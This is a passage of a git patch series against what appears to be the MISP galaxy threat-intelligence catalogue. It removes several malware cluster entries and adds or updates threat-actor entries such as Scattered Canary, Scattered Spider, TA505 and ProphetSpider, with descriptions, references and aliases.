"uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", - "value": "Unidentified APK 005" - }, { "description": "Information stealer posing as a fake banking app, targeting Korean users.", "meta": { @@ -34004,22 +33992,6 @@ "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", "value": "Makop" }, - { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", - "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11", - "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://twitter.com/siri_urz/status/1221797493849018368" - ], - "synonyms": [], - "type": [] - }, - "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", - "value": "Makop Ransomware" - }, { "description": "According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.", "meta": { @@ -48033,19 +48005,6 @@ "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", "value": "SUGARRUSH" }, - { - "description": "According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarush", - "https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping" - ], - "synonyms": [], - "type": [] - }, - "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", - "value": "SUGARUSH" - }, { "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", "meta": { @@ -48896,20 +48855,6 @@ "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, - { - "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot" - ], - "synonyms": [ - "FINTEAM" - ], - "type": [] - }, - "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", - "value": "TeamBot" - }, { "description": "", "meta": { @@ -50938,18 +50883,6 @@ "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, - { - "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" - ], - "synonyms": [], - "type": [] - }, - "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", - "value": "Unidentified 061 (Windows)" - }, { "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", "meta": { @@ -51041,19 +50974,6 @@ "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", "value": "Unidentified 072 (Metamorfo Loader)" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", - "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", - "value": "Unidentified 073 (Charming Kitten)" - }, { "description": "", "meta": { @@ -51200,32 +51120,6 @@ "uuid": "d7f1e6cf-1880-426a-881a-619309f32c37", "value": "Unidentified 088 (Nim Ransomware)" }, - { - "description": "Downloader used in suspected APT attack against Vietnam.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" - ], - "synonyms": [ - "5.t Downloader" - ], - "type": [] - }, - "uuid": "685c9c30-aa9f-43ee-a262-43c17c350049", - "value": "Unidentified 089 (Downloader)" - }, - { - "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090" - ], - "synonyms": [], - "type": [] - }, - "uuid": "565de3f5-7eb7-43ca-a9d9-b588dfd6a50a", - "value": "Unidentified 090 (Lazarus)" - }, { "description": "Avast found this unidentified RAT, which abuses a code-signing certificate by the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.", "meta": { @@ -51368,32 +51262,6 @@ "uuid": "0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5", "value": "Unidentified 100 (APT-Q-12)" }, - { - "description": "Potential Lazarus sample.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101", - "https://twitter.com/RedDrip7/status/1595365451495706624", - "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087", - "value": "Unidentified 101 (Lazarus?)" - }, - { - "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" - ], - "synonyms": [], - "type": [] - }, - "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc", - "value": "Unidentified 102 (Donot)" - }, { "description": "A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.", "meta": { From e393780af898cbfe02804ee92df29295106311b0 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 15:11:10 +0200 Subject: [PATCH 07/16] [threa-actors] Add Scattered Canary --- clusters/threat-actor.json | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 60e1cae..ff32c7b 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11766,6 +11766,19 @@ ], "uuid": "8cb6f57b-9ebb-45a6-a89f-9efdb8065d70", "value": "Storm-0324" + }, + { + "description": "When the first member of Scattered Canary, who, for the purposes of this report, we call\nAlpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned\nthe tricks of the trade from a mentor. However, within a few years, he had honed his craft\nenough to expand into romance scams, where he met his first “employee,” Beta. Once they\nhad secured enough mules via their romance scams to launder their stolen money, they shifted\nfrom targeting individuals to targeting enterprises, and the group’s BEC operation was born.", + "meta": { + "country": "Nigeria", + "motive": "Cybercrime", + "references": [ + "https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/", + "https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf", + "https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20" + ] + }, + "value": "Scattered Canary" } ], "version": 282 From b8f8fce4b61a88b4a8444814dee382c5d31a7073 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 15:17:40 +0200 Subject: [PATCH 08/16] [threa-actors] Add Scattered Spider --- clusters/threat-actor.json | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index ff32c7b..5e50119 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11779,6 +11779,40 @@ ] }, "value": "Scattered Canary" + }, + + { + "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.", + "meta": { + "country": "", + "references": [ + "https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/", + "https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/" + ], + "synonyms": [ + "UNC3944", + "Muddled Libra", + "Oktapus", + "Scattered Swine" + ] + }, + "related": [ + { + "dest-uuid": "", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "uses" + }, + { + "dest-uuid": "", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "uses" + } + ], + "value": "Scattered Spider" } ], "version": 282 From 0fba8d3f277780d072bea318ffc0eb086d2fc2fb Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 15:19:20 +0200 Subject: [PATCH 09/16] [threat-actors] bump version --- clusters/threat-actor.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 5e50119..eebb0ba 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11815,5 +11815,5 @@ "value": "Scattered Spider" } ], - "version": 282 + "version": 283 } From b2599deaae43b72873eae8c3602d925a303245c3 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 19:17:47 +0200 Subject: [PATCH 10/16] fixes --- clusters/threat-actor.json | 17 ----------------- 1 file changed, 17 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index eebb0ba..879332d 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11784,7 +11784,6 @@ { "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.", "meta": { - "country": "", "references": [ "https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/", "https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/" @@ -11796,22 +11795,6 @@ "Scattered Swine" ] }, - "related": [ - { - "dest-uuid": "", - "tags": [ - "estimative-language:likelihood-probability=\"likely\"" - ], - "type": "uses" - }, - { - "dest-uuid": "", - "tags": [ - "estimative-language:likelihood-probability=\"likely\"" - ], - "type": "uses" - } - ], "value": "Scattered Spider" } ], From 081b2e619b4a8ee0a7f0c9a3557ede56c9a7e066 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 19:18:00 +0200 Subject: [PATCH 11/16] fixes --- clusters/threat-actor.json | 1 - 1 file changed, 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 879332d..0065292 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11780,7 +11780,6 @@ }, "value": "Scattered Canary" }, - { "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.", "meta": { From e6266e8e59fbb3a18c09880d2e7dc213fb06627e Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 19:25:10 +0200 Subject: [PATCH 12/16] fixes --- clusters/threat-actor.json | 2 ++ 1 file changed, 2 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 0065292..5d1f1c7 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11778,6 +11778,7 @@ "https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20" ] }, + "uuid": "fde2d0f9-ed23-4cdc-96d3-f0a01f804707", "value": "Scattered Canary" }, { @@ -11794,6 +11795,7 @@ "Scattered Swine" ] }, + "uuid": "3b238f3a-c67a-4a9e-b474-dc3897e00129", "value": "Scattered Spider" } ], From 89ab7728b02839d5df41e056eec639936d7ac868 Mon Sep 17 00:00:00 2001 From: jstnk9 Date: Tue, 3 Oct 2023 12:44:44 +0200 Subject: [PATCH 13/16] updated TA505 countries and industries affected updated TA505 countries and industries affected --- clusters/threat-actor.json | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 5d1f1c7..9caddb0 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -7106,6 +7106,31 @@ "ATK103", "Hive0065", "CHIMBORAZO" + ], + "cfr-target-category": [ + "Education", + "Finance", + "Health", + "Retail", + "Hospitality" + ], + "cfr-suspected-victims": [ + "Australia", + "Canada", + "Czech Republic", + "Germany", + "Hungary", + "India", + "Japan", + "Romania", + "Serbia", + "Singapore", + "South Korea", + "Spain", + "Thailand", + "Turkey", + "United Kingdom", + "United States" ] }, "related": [ From ce7d54c96af95b75a458e18f48a1aa1c0b5d56e4 Mon Sep 17 00:00:00 2001 From: Paul Stark Date: Tue, 3 Oct 2023 11:56:45 -0400 Subject: [PATCH 14/16] chg [misp-galaxy] update Nigeria from name to 2-digit code --- clusters/threat-actor.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 5d1f1c7..d0e530d 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11770,7 +11770,7 @@ { "description": "When the first member of Scattered Canary, who, for the purposes of this report, we call\nAlpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned\nthe tricks of the trade from a mentor. However, within a few years, he had honed his craft\nenough to expand into romance scams, where he met his first “employee,” Beta. Once they\nhad secured enough mules via their romance scams to launder their stolen money, they shifted\nfrom targeting individuals to targeting enterprises, and the group’s BEC operation was born.", "meta": { - "country": "Nigeria", + "country": "NG", "motive": "Cybercrime", "references": [ "https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/", From 89a193d315b2c5132419cbcb03d33778f6cb5bb5 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 4 Oct 2023 10:48:44 +0200 Subject: [PATCH 15/16] fix: [threat-actor] version updated + jq all the things --- clusters/threat-actor.json | 52 +++++++++++++++++++------------------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 9caddb0..b202344 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -7074,6 +7074,31 @@ { "description": "TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.", "meta": { + "cfr-suspected-victims": [ + "Australia", + "Canada", + "Czech Republic", + "Germany", + "Hungary", + "India", + "Japan", + "Romania", + "Serbia", + "Singapore", + "South Korea", + "Spain", + "Thailand", + "Turkey", + "United Kingdom", + "United States" + ], + "cfr-target-category": [ + "Education", + "Finance", + "Health", + "Retail", + "Hospitality" + ], "country": "RU", "refs": [ "https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/", @@ -7106,31 +7131,6 @@ "ATK103", "Hive0065", "CHIMBORAZO" - ], - "cfr-target-category": [ - "Education", - "Finance", - "Health", - "Retail", - "Hospitality" - ], - "cfr-suspected-victims": [ - "Australia", - "Canada", - "Czech Republic", - "Germany", - "Hungary", - "India", - "Japan", - "Romania", - "Serbia", - "Singapore", - "South Korea", - "Spain", - "Thailand", - "Turkey", - "United Kingdom", - "United States" ] }, "related": [ @@ -11824,5 +11824,5 @@ "value": "Scattered Spider" } ], - "version": 283 + "version": 284 } From 1b33cad11dfb1ee562528afe34a46ceb6a5cd4d8 Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Wed, 4 Oct 2023 16:39:01 +0100 Subject: [PATCH 16/16] adding aliases to ProphetSpider --- clusters/threat-actor.json | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index fb10ee4..f7856ac 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11489,7 +11489,13 @@ "country": "", "references": [ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/" + "https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/", + "https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker", + "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated" + ], + "synonyms": [ + "GOLD MELODY", + "UNC961" ] }, "related": [